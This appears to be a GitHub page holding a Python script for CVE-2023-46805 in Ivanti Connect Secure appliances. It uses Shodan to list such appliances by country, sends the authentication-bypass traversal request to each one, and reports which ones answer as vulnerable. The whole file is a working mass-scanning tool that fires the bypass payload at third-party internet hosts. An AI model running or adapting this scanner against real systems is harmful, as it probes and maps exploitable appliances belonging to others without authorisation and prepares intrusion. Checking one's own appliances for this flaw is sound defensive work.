-
Notifications
You must be signed in to change notification settings - Fork 3
/
CVE-2023-46805.py
68 lines (56 loc) · 2.95 KB
/
CVE-2023-46805.py
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
"""
Quick scanner for possible vulnerable Ivanti Connect Secure appliances by country using Shodan.
Script version: 1.3
Updated with the recent blog post made by Assetnote
"""
import requests
import urllib3
import argparse
from colorama import Fore, Back, Style
from shodan import Shodan
urllib3.disable_warnings()
parser = argparse.ArgumentParser(
prog='CVE-2023-46805 Scanner',
description='Quick scanner for possible vulnerable Ivanti Connect Secure appliances by country using Shodan.',
epilog='Please make sure that you are using a valid Shodan API Key')
parser.add_argument('-c', '--country', required=True, help="Country code (like CL, US, CA, BR)") # option that takes the country
args = parser.parse_args()
api = Shodan('API-KEY') # Here goes your Shodan API Key
ENDPOINT = "/api/v1/cav/client/status/../../admin/options"
vulnerable_appliance = 0
patched_appliance = 0
connection_error = 0
def bold_text(text):
bold_start = '\033[1m'
bold_end = '\033[0m'
return bold_start + text + bold_end
try:
results = api.search('http.favicon.hash:-1439222863 country:'+str(args.country)) # Ivanti Connect Secure Favicon MurmurHash 3
print("====================================================")
print(Fore.BLUE + bold_text('Ivanti Connect Secure Appliances found: {}'.format(results['total'])))
print(Style.RESET_ALL)
print("====================================================\n")
for ip in results['matches']:
ip_san=str(ip['ip_str']).replace("\n", "")
org=str(ip['org']).replace("\n", "")
url="https://"+ip_san+ENDPOINT
try:
response = requests.get(url, verify=False, timeout=10) # Consider change the timeout
if response.status_code == 200: # Based on the response of the server we can check if the XML Mitigation was applied or not
print(Fore.YELLOW + ip_san, org, bold_text(" Vulnerable ICS Appliance")) # If we receive a successful 200 HTTP probably the appliance is vulnerable to CVE-2023-46805 Authentication Bypass
vulnerable_appliance = vulnerable_appliance + 1
print(Style.RESET_ALL)
else:
print(Fore.GREEN + ip_san, org, bold_text(" XML Mitigation Applied")) # If not, the XML mitigation was applied
patched_appliance = patched_appliance + 1
print(Style.RESET_ALL)
except:
connection_error = connection_error + 1
print(Fore.RED + ip_san , org, bold_text("Connection error"))
print(Style.RESET_ALL)
print("====================================================\n")
print(Fore.YELLOW + "Vulnerable appliances found:", bold_text(str(vulnerable_appliance)))
print(Fore.GREEN + "Patched appliances found:", bold_text(str(patched_appliance)))
print(Fore.RED + "Connection errors found:", bold_text(str(connection_error)),"\n")
except Exception as e:
print('Error: {}'.format(e))